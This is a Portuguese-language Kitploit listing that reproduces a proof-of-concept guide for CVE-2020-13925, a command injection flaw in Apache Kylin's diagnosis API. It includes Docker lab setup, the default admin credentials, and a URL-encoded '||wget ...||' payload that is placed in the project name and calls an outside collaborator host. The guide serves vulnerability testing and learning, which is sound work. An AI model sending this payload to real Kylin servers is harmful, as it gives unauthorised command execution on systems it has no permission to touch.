Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2020-13925 — Prova de Conceito e guia de reprodução para CVE-2020-13925, uma vulnerabilidade de injeção de comandos na API de diagnóstico do Apache Kylin, com configuração de laboratório baseada em Docker e etapas de exploração. | Kitploit
Ferramentas/GitHubGitHub/bit4woo/cve-2020-13925
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubbit4woo/cve-2020-13925

CVE-2020-13925

Prova de Conceito e guia de reprodução para CVE-2020-13925, uma vulnerabilidade de injeção de comandos na API de diagnóstico do Apache Kylin, com configuração de laboratório baseada em Docker e etapas de exploração.

Ver Repositório
161há 6 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2020-13925

Configuração do ambiente

Consulte https://github.com/apache/kylin para implantar o ambiente usando docker, modificando a versão para 3.0.1 (versão vulnerável). A opção -m 8G \ pode ser removida — ela serve para alocar o tamanho da memória.

Em seguida, acesse http://host:7070/kylin/login. O nome de usuário e senha iniciais são ADMIN/KYLIN.

root@kitploit:~
docker pull apachekylin/apache-kylin-standalone:3.0.1

docker run -d \
    -m 8G \
    -p 7070:7070 \
    -p 8088:8088 \
    -p 50070:50070 \
    -p 8032:8032 \
    -p 8042:8042 \
    -p 16010:16010 \
    apachekylin/apache-kylin-standalone:3.0.1
    
docker run -d \
    -p 7070:7070 \
    -p 8088:8088 \
    -p 50070:50070 \
    -p 8032:8032 \
    -p 8042:8042 \
    -p 16010:16010 \
    apachekylin/apache-kylin-standalone:3.0.1

PoC de verificação de vulnerabilidade

root@kitploit:~
Requisição original:
http://host:port/kylin/api/diag/project/learn_kylin/download

Requisição PoC, método GET:
http://host:port/kylin/api/diag/project/%7c%7cwget%20h1j96qoac5o9mbqpkewkhxxa218rwg.burpcollaborator.net%7c%7c/download

Ou seja, substitua o nome do projeto "learn_kylin" pelo seguinte payload ao acessar:
||wget h1j96qoac5o9mbqpkewkhxxa218rwg.burpcollaborator.net||

Passos para reprodução

Acesse System-Configuration-Diagnosis. Dispare a requisição que baixa as informações de diagnóstico http://host:port/kylin/api/diag/project/learn_kylin/download image.png

Ou seja, substitua o nome do projeto "learn_kylin" pelo payload acima ao acessar.

image.png

Links de referência

https://mp.weixin.qq.com/s/LdEgENX2_b8tb12n4H9KJQ

Baixar ferramenta